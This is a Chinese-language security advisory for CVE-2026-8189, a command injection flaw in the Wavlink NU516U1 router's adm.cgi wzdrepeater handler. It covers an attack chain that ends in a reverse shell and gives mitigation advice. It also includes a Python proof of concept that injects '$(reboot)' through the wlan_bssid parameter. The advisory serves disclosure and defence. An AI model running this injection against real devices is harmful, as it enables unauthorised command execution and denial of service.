CVE-2026-8189 Wavlink路由器命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-8189

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Wavlink NU516U1

漏洞概述

Wavlink NU516U1 M16U1_V240425型号设备存在操作系统命令注入漏洞。该漏洞源于/cgi-bin/adm.cgi文件中的wzdrepeater函数未正确过滤用户输入。攻击者可利用wlan_bssid等参数构造恶意请求，通过远程方式执行任意系统命令。由于无需用户交互且利用难度较低，该漏洞可能被用于获取服务器控制权，对机密性、完整性和可用性造成中等程度的影响。

技术细节

该漏洞位于Wavlink路由器Web管理接口的/cgi-bin/adm.cgi脚本中，具体涉及wzdrepeater功能模块。在处理中继器配置请求时，程序直接将用户提交的wlan_bssid、sel_Automode及sel_EncrypTyp参数传递给底层系统命令执行环境，未进行有效的安全校验或转义。攻击者首先需要通过网络访问设备的Web管理界面，并具备低权限账户。随后，攻击者向/cgi-bin/adm.cgi发送特制的HTTP POST请求，在上述参数中注入Shell元字符（如;、&、|或反引号）。由于后端程序直接拼接命令字符串，注入的载荷将被操作系统解析执行。成功的利用可导致攻击者以Web服务器进程的权限执行任意系统指令，从而窃取敏感信息、篡改配置或导致设备拒绝服务。目前已有公开的PoC代码验证了该漏洞的有效性。

攻击链分析

STEP 1

侦察

攻击者扫描网络寻找Wavlink NU516U1设备，并确认其Web管理接口的开放情况。

STEP 2

认证

攻击者获取设备的低权限用户凭证（由于PR:L要求），登录Web管理后台。

STEP 3

漏洞利用

攻击者构造包含恶意Shell命令的HTTP POST请求，发送至/cgi-bin/adm.cgi接口，利用wlan_bssid等参数进行命令注入。

STEP 4

命令执行

服务器端未过滤输入，直接将恶意参数传递给系统Shell执行，导致攻击者获得系统命令执行权限。

STEP 5

建立控制

攻击者利用执行权限反弹Shell，进一步控制设备或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://<target_ip>/cgi-bin/adm.cgi"

# Data payload with command injection
# The vulnerability affects parameters: wlan_bssid, sel_Automode, sel_EncrypTyp
# Example payload in wlan_bssid
payload_data = {
    "action": "wzdrepeater",
    "wlan_bssid": "$(reboot)", # Injected command to reboot the device
    "sel_Automode": "1",
    "sel_EncrypTyp": "1"
}

# Headers (might need authentication cookies based on PR:L)
headers = {
    "Cookie": "<admin_session_cookie>"
}

try:
    response = requests.post(url, data=payload_data, headers=headers, timeout=5)
    if response.status_code == 200:
        print("Request sent successfully. Check if command executed.")
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

Wavlink NU516U1 M16U1_V240425

防御指南

临时缓解措施

在未升级固件前，建议立即禁用设备的Web远程管理功能，并将管理后台仅限制在受信任的内网环境中访问。同时，检查设备日志是否存在异常的cgi-bin调用记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8189
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8189
3 Details https://www.cvedetails.com/cve/CVE-2026-8189/
4 VulDB https://vuldb.com/cve/CVE-2026-8189
5 Link https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_2/2.md
6 Link https://vuldb.com/submit/800728
7 Link https://vuldb.com/vuln/362341
8 Link https://vuldb.com/vuln/362341/cti